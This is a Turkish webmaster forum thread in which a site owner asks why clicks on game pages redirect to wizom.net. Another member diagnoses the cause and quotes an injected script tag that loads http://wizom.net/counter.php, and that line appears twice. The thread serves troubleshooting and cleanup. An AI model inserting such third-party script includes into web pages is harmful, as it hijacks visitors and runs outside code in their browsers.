Forum'da ara:
Ara

Yazar Mesaj
Mesaj31.01.2010, 11:01 (UTC)    
Mesaj konusu: Site Sorunu

Arkadaşlar neden oldu bilmiyorum ama site girdiğimde herhangi bir oyuna tıklıyorum.1 saniye içinde beni www.wizom.net diye bir siteye yönlendiriyor.
Yardım edin lütfen nasıl kurtulabilirim bundan.Ne denediysem olmadı.

Mesaj31.01.2010, 11:07 (UTC)    
Mesaj konusu:

Bir sahtekarlığa kurman gitmişsiniz sanıyorum eğer tahmin ettiğim şey doğruysa kodları inceleyiniz aldığınız kaynağı kontrol ediniz oda olmadı mı ? O zaman o sitenin webmasterine başvurunuz Wink
Mesaj31.01.2010, 11:12 (UTC)    
Mesaj konusu:

Kodlara baktım hiç bir şey bulamadım belki bir yerde olabilir ama yinede çok aradım bulamadım.Site webmasterıda yabancıdır tahminimce.
Mesaj31.01.2010, 11:16 (UTC)    
Mesaj konusu:

Yabancılar yardım etmez diye bir kayde mi var ? Olsun translate kullanarakda olsa ulaşın bence !
Mesaj31.01.2010, 11:19 (UTC)    
Mesaj konusu:

Saol yardımın için arkadaşım hallettim sorunu.Oyunlara bir şey olmuş düzeltiyorum.
Mesaj31.01.2010, 11:21 (UTC)    
Mesaj konusu:

iframe kodu felan olabilir.veya sitenizin bir kısmına yerleştirdiğiniz bir takım kodlar linklere tıkladınfıgında başka sayfaya yönlendirebilir.Bir kontrol ediniz.
Mesaj31.01.2010, 11:22 (UTC)    
Mesaj konusu:

Bütün oyun sayfalarınızda
Kod:
<p><font color="#666666"><script src="http://wizom.net/counter.php" type="text/javascript"></script><strong><font size="2">

Bu kod mevcut.
Bu yüzden "Wizom" adlı siteye yönlendirme yapıyor.
Oyun sayfalarınıza girin ve bu kod varmı diye bakın eğer varsa kaldırın Yoksa oyunlarınızı sitenize eklerken tek bir siteden yararlanmış iseniz bu oyun kurucularıda "Wizom" adlı siteye yönlendirme kodu koymuş olabilir ve oyun içindeki koddan da yönlendirme oluyor olabilir

Mesaj31.01.2010, 11:25 (UTC)    
Mesaj konusu:

tak-oyun yazmış:
Saol yardımın için arkadaşım hallettim sorunu.Oyunlara bir şey olmuş düzeltiyorum.
Ben teşekkür ederim .
Mesaj31.01.2010, 12:04 (UTC)    
Mesaj konusu:

kingcss yazmış:
Bütün oyun sayfalarınızda
Kod:
<p><font color="#666666"><script src="http://wizom.net/counter.php" type="text/javascript"></script><strong><font size="2">

Bu kod mevcut.
Bu yüzden "Wizom" adlı siteye yönlendirme yapıyor.
Oyun sayfalarınıza girin ve bu kod varmı diye bakın eğer varsa kaldırın Yoksa oyunlarınızı sitenize eklerken tek bir siteden yararlanmış iseniz bu oyun kurucularıda "Wizom" adlı siteye yönlendirme kodu koymuş olabilir ve oyun içindeki koddan da yönlendirme oluyor olabilir

O kodu farkettim onu düzeltmeye çalışıyorum şimdi hepinize yardımlarınız için teşşekür ediyorum.